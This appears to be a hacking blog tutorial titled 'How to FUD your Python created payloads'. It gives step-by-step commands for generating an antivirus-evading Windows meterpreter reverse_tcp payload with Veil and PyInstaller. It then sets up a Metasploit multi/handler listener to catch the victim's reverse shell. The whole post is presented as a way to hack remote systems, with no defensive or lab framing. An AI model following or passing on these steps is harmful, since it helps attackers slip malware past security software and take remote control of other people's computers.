HOW TO FUD YOUR PYTHON CREATED PAYLOADS

Hacking a remote system is the favourite of all time for anyone.so here we tell you how to hack by fud your python created payloads


Requirements: Linux with Metasploit Framework and Veil

Download Veil here!

I used for this Tutorial Kali Linux: http://www.kali.org

So first of all, download and unzip the Veil Package!

(I will use [ code] for the commands!)


Code:

unzip Veil-master.zip



[Image: 3ba33043c5c8854beacf792388622804.png]




now navigate to the setup directory in the Veil Folder






Code:

cd setup




Then run setup.sh



Code:

./setup.sh




Now you just have to click always "Forward" until Python 2.7.5, Pywin and Pycrypto is set up!

[Image: 5506aeec90b626636776ddcb8f75f130.png]

[Image: 35ea0f7ad60249e0c90552e65d91a456.png]

[Image: 858f08af493c697d9e6c5edf62fbba61.png]


Open now Veil Folder and Veil.py


Code:

./Veil.py




You can see 9 Options, select one you like!



Code:

a Number from 1-9



[Image: 47ce6448f0c39d00b48cbea9634ce31b.png]




Then use the default msfvenom!



Code:

1



 
[Image: d08013803ee965db71c584203766c66d.png]


Use Reverse_Tcp



Code:

1



[Image: 3535db45ec7ec6a58132a65abdc91df9.png]



and Pyinstaller!


Code:

1



[Image: 38334a5c5d2b58418930b76c33f36175.png]




Now it will generate a Payload for you !

[Image: f10278031d1343b829184a4813687d51.png]


Again open a new Kali Terminale and open the Metasploit Console



Code:

msfconsole




Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.



Code:

use exploit/multi/handler



set payload windows/meterpreter/reverse_tcp

set lhost 192.168.178.1 [your local or remote host]

set lport 2357 [the port you selected]

exploit

 
[Image: 5d4faa452a4eed0c33f6952221271469.png]


Congratualtion, your Payload was generated successfully!

No comments:

Post a Comment